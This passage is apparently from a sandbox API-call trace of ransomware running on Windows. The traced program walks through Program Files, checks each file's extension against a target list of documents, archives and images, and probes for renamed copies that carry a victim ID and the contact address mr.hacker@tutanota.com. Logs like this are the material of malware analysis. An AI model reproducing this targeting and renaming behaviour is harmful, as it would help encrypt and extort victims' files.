lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0264.725] lstrlenW (lpString=".bz2") returned 4 [0264.725] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0264.725] lstrlenW (lpString=".7z") returned 3 [0264.725] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0264.725] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0264.725] lstrlenW (lpString=".dbf") returned 4 [0264.725] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0264.725] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0264.725] lstrlenW (lpString=".1cd") returned 4 [0264.725] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0264.725] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0264.725] lstrlenW (lpString=".jpg") returned 4 [0264.725] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0264.725] Sleep (dwMilliseconds=0x64) [0264.919] Sleep (dwMilliseconds=0x64) [0265.133] lstrcmpiW (lpString1=".inc", lpString2=".USA") returned -1 [0265.133] lstrlenW (lpString="adcjavas.inc") returned 12 [0265.134] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0265.142] GetFileSizeEx (in: hFile=0x2b4, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=630) returned 1 [0265.142] CloseHandle (hObject=0x2b4) returned 1 [0265.142] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc")) returned 0x20 [0265.142] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0265.142] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.142] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0265.142] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0265.142] lstrlenW (lpString=".doc") returned 4 [0265.142] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0265.142] lstrlenW (lpString=".docx") returned 5 [0265.142] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0265.142] lstrlenW (lpString=".pdf") returned 4 [0265.142] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0265.142] lstrlenW (lpString=".xls") returned 4 [0265.142] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0265.142] lstrlenW (lpString=".xlsx") returned 5 [0265.142] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0265.142] lstrlenW (lpString=".ppt") returned 4 [0265.142] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0265.142] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0265.142] lstrlenW (lpString=".zip") returned 4 [0265.142] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0265.142] lstrlenW (lpString=".rar") returned 4 [0265.143] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0265.143] lstrlenW (lpString=".bz2") returned 4 [0265.143] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0265.143] lstrlenW (lpString=".7z") returned 3 [0265.143] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0265.143] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0265.143] lstrlenW (lpString=".dbf") returned 4 [0265.143] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0265.143] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0265.143] lstrlenW (lpString=".1cd") returned 4 [0265.143] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1 [0265.143] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0265.143] lstrlenW (lpString=".jpg") returned 4 [0265.143] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0265.143] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0265.143] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0265.143] lstrlenW (lpString=".doc") returned 4 [0265.143] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0265.143] lstrlenW (lpString=".docx") returned 5 [0265.143] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0265.144] lstrlenW (lpString=".pdf") returned 4 [0265.144] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0265.144] lstrlenW (lpString=".xls") returned 4 [0265.144] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0265.144] lstrlenW (lpString=".xlsx") returned 5 [0265.144] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0265.144] lstrlenW (lpString=".ppt") returned 4 [0265.144] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0265.144] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0265.144] lstrlenW (lpString=".zip") returned 4 [0265.144] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0265.144] lstrlenW (lpString=".rar") returned 4 [0265.144] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0265.144] lstrlenW (lpString=".bz2") returned 4 [0265.144] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0265.144] lstrlenW (lpString=".7z") returned 3 [0265.144] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0265.144] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0265.144] lstrlenW (lpString=".dbf") returned 4 [0265.144] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0265.144] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0265.144] lstrlenW (lpString=".1cd") returned 4 [0265.144] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1 [0265.144] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0265.144] lstrlenW (lpString=".jpg") returned 4 [0265.144] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0265.145] Sleep (dwMilliseconds=0x64) [0265.540] lstrcmpiW (lpString1=".png", lpString2=".USA") returned -1 [0265.540] lstrlenW (lpString="btn-next-static.png") returned 19 [0265.540] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\btn-next-static.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a8 [0265.566] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=3580) returned 1 [0265.566] CloseHandle (hObject=0x2a8) returned 1 [0265.566] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\btn-next-static.png")) returned 0x20 [0265.591] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\btn-next-static.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0265.592] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\btn-next-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.592] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png") returned 72 [0265.592] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png") returned 72 [0265.592] lstrlenW (lpString=".doc") returned 4 [0265.592] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0265.592] lstrlenW (lpString=".docx") returned 5 [0265.592] lstrcmpiW (lpString1=".docx", lpString2="c.png") returned -1 [0265.592] lstrlenW (lpString=".pdf") returned 4 [0265.593] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0265.593] lstrlenW (lpString=".xls") returned 4 [0265.593] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0265.593] lstrlenW (lpString=".xlsx") returned 5 [0265.593] lstrcmpiW (lpString1=".xlsx", lpString2="c.png") returned -1 [0265.593] lstrlenW (lpString=".ppt") returned 4 [0265.593] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0265.593] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png") returned 72 [0265.593] lstrlenW (lpString=".zip") returned 4 [0265.593] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0265.593] lstrlenW (lpString=".rar") returned 4 [0265.593] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0265.593] lstrlenW (lpString=".bz2") returned 4 [0265.593] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0265.593] lstrlenW (lpString=".7z") returned 3 [0265.593] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0265.593] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png") returned 72 [0265.593] lstrlenW (lpString=".dbf") returned 4 [0265.593] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0265.593] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png") returned 72 [0265.593] lstrlenW (lpString=".1cd") returned 4 [0265.593] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0265.593] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png") returned 72 [0265.593] lstrlenW (lpString=".jpg") returned 4 [0265.593] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0265.593] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png") returned 72 [0265.593] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png") returned 72 [0265.593] lstrlenW (lpString=".doc") returned 4 [0265.593] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0265.593] lstrlenW (lpString=".docx") returned 5 [0265.594] lstrcmpiW (lpString1=".docx", lpString2="c.png") returned -1 [0265.594] lstrlenW (lpString=".pdf") returned 4 [0265.594] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0265.594] lstrlenW (lpString=".xls") returned 4 [0265.594] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0265.594] lstrlenW (lpString=".xlsx") returned 5 [0265.594] lstrcmpiW (lpString1=".xlsx", lpString2="c.png") returned -1 [0265.594] lstrlenW (lpString=".ppt") returned 4 [0265.594] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0265.594] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png") returned 72 [0265.594] lstrlenW (lpString=".zip") returned 4 [0265.594] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0265.594] lstrlenW (lpString=".rar") returned 4 [0265.594] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0265.594] lstrlenW (lpString=".bz2") returned 4 [0265.594] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0265.594] lstrlenW (lpString=".7z") returned 3 [0265.594] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0265.594] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png") returned 72 [0265.594] lstrlenW (lpString=".dbf") returned 4 [0265.594] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0265.595] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png") returned 72 [0265.595] lstrlenW (lpString=".1cd") returned 4 [0265.595] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0265.595] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png") returned 72 [0265.595] lstrlenW (lpString=".jpg") returned 4 [0265.595] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0265.595] lstrcmpiW (lpString1=".png", lpString2=".USA") returned -1 [0265.595] lstrlenW (lpString="content-background.png") returned 22 [0265.595] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\content-background.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a8 [0265.596] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=581394) returned 1 [0265.596] CloseHandle (hObject=0x2a8) returned 1 [0265.596] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\content-background.png")) returned 0x20 [0265.596] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\content-background.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0265.596] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\content-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.596] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png") returned 75 [0265.596] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png") returned 75 [0265.596] lstrlenW (lpString=".doc") returned 4 [0265.596] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0265.596] lstrlenW (lpString=".docx") returned 5 [0265.596] lstrcmpiW (lpString1=".docx", lpString2="d.png") returned -1 [0265.596] lstrlenW (lpString=".pdf") returned 4 [0265.596] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0265.596] lstrlenW (lpString=".xls") returned 4 [0265.596] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0265.596] lstrlenW (lpString=".xlsx") returned 5 [0265.596] lstrcmpiW (lpString1=".xlsx", lpString2="d.png") returned -1 [0265.596] lstrlenW (lpString=".ppt") returned 4 [0265.596] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0265.596] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png") returned 75 [0265.596] lstrlenW (lpString=".zip") returned 4 [0265.597] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0265.597] lstrlenW (lpString=".rar") returned 4 [0265.597] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0265.597] lstrlenW (lpString=".bz2") returned 4 [0265.597] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0265.597] lstrlenW (lpString=".7z") returned 3 [0265.597] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0265.597] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png") returned 75 [0265.597] lstrlenW (lpString=".dbf") returned 4 [0265.597] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0265.597] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png") returned 75 [0265.597] lstrlenW (lpString=".1cd") returned 4 [0265.597] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0265.597] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png") returned 75 [0265.597] lstrlenW (lpString=".jpg") returned 4 [0265.597] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0265.597] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png") returned 75 [0265.597] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png") returned 75 [0265.597] lstrlenW (lpString=".doc") returned 4 [0265.597] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0265.597] lstrlenW (lpString=".docx") returned 5 [0265.597] lstrcmpiW (lpString1=".docx", lpString2="d.png") returned -1 [0265.597] lstrlenW (lpString=".pdf") returned 4 [0265.597] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0265.597] lstrlenW (lpString=".xls") returned 4 [0265.597] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0265.597] lstrlenW (lpString=".xlsx") returned 5 [0265.597] lstrcmpiW (lpString1=".xlsx", lpString2="d.png") returned -1 [0265.597] lstrlenW (lpString=".ppt") returned 4 [0265.597] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0265.598] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png") returned 75 [0265.598] lstrlenW (lpString=".zip") returned 4 [0265.598] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0265.598] lstrlenW (lpString=".rar") returned 4 [0265.598] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0265.598] lstrlenW (lpString=".bz2") returned 4 [0265.598] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0265.598] lstrlenW (lpString=".7z") returned 3 [0265.598] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0265.598] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png") returned 75 [0265.598] lstrlenW (lpString=".dbf") returned 4 [0265.598] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0265.598] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png") returned 75 [0265.598] lstrlenW (lpString=".1cd") returned 4 [0265.598] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0265.598] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png") returned 75 [0265.598] lstrlenW (lpString=".jpg") returned 4 [0265.598] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0265.598] lstrcmpiW (lpString1=".png", lpString2=".USA") returned -1 [0265.598] lstrlenW (lpString="content-foreground.png") returned 22 [0265.598] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\content-foreground.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a8 [0265.598] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=49904) returned 1 [0265.598] CloseHandle (hObject=0x2a8) returned 1 [0265.599] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\content-foreground.png")) returned 0x20 [0265.599] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\content-foreground.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0265.599] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\content-foreground.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.599] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png") returned 75 [0265.599] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png") returned 75 [0265.599] lstrlenW (lpString=".doc") returned 4 [0265.599] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0265.599] lstrlenW (lpString=".docx") returned 5 [0265.599] lstrcmpiW (lpString1=".docx", lpString2="d.png") returned -1 [0265.599] lstrlenW (lpString=".pdf") returned 4 [0265.599] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0265.599] lstrlenW (lpString=".xls") returned 4 [0265.599] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0265.599] lstrlenW (lpString=".xlsx") returned 5 [0265.599] lstrcmpiW (lpString1=".xlsx", lpString2="d.png") returned -1 [0265.599] lstrlenW (lpString=".ppt") returned 4 [0265.599] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0265.599] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png") returned 75 [0265.599] lstrlenW (lpString=".zip") returned 4 [0265.599] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0265.599] lstrlenW (lpString=".rar") returned 4 [0265.599] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0265.600] lstrlenW (lpString=".bz2") returned 4 [0265.600] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0265.600] lstrlenW (lpString=".7z") returned 3 [0265.600] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0265.600] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png") returned 75 [0265.600] lstrlenW (lpString=".dbf") returned 4 [0265.600] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0265.600] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png") returned 75 [0265.600] lstrlenW (lpString=".1cd") returned 4 [0265.600] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0265.600] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png") returned 75 [0265.600] lstrlenW (lpString=".jpg") returned 4 [0265.600] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0265.600] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png") returned 75 [0265.600] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png") returned 75 [0265.600] lstrlenW (lpString=".doc") returned 4 [0265.600] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0265.600] lstrlenW (lpString=".docx") returned 5 [0265.600] lstrcmpiW (lpString1=".docx", lpString2="d.png") returned -1 [0265.600] lstrlenW (lpString=".pdf") returned 4 [0265.600] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0265.600] lstrlenW (lpString=".xls") returned 4 [0265.600] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0265.600] lstrlenW (lpString=".xlsx") returned 5 [0265.600] lstrcmpiW (lpString1=".xlsx", lpString2="d.png") returned -1 [0265.600] lstrlenW (lpString=".ppt") returned 4 [0265.600] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0265.600] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png") returned 75 [0265.600] lstrlenW (lpString=".zip") returned 4 [0265.600] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0265.600] lstrlenW (lpString=".rar") returned 4 [0265.601] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0265.601] lstrlenW (lpString=".bz2") returned 4 [0265.601] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0265.601] lstrlenW (lpString=".7z") returned 3 [0265.601] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0265.601] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png") returned 75 [0265.601] lstrlenW (lpString=".dbf") returned 4 [0265.601] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0265.601] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png") returned 75 [0265.601] lstrlenW (lpString=".1cd") returned 4 [0265.601] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0265.601] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png") returned 75 [0265.601] lstrlenW (lpString=".jpg") returned 4 [0265.601] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0265.601] lstrcmpiW (lpString1=".png", lpString2=".USA") returned -1 [0265.601] lstrlenW (lpString="curtains.png") returned 12 [0265.601] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\curtains.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a8 [0265.601] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=47300) returned 1 [0265.601] CloseHandle (hObject=0x2a8) returned 1 [0265.602] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\curtains.png")) returned 0x20 [0265.602] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\curtains.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0265.602] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\curtains.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.602] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png") returned 65 [0265.602] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png") returned 65 [0265.602] lstrlenW (lpString=".doc") returned 4 [0265.602] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0265.602] lstrlenW (lpString=".docx") returned 5 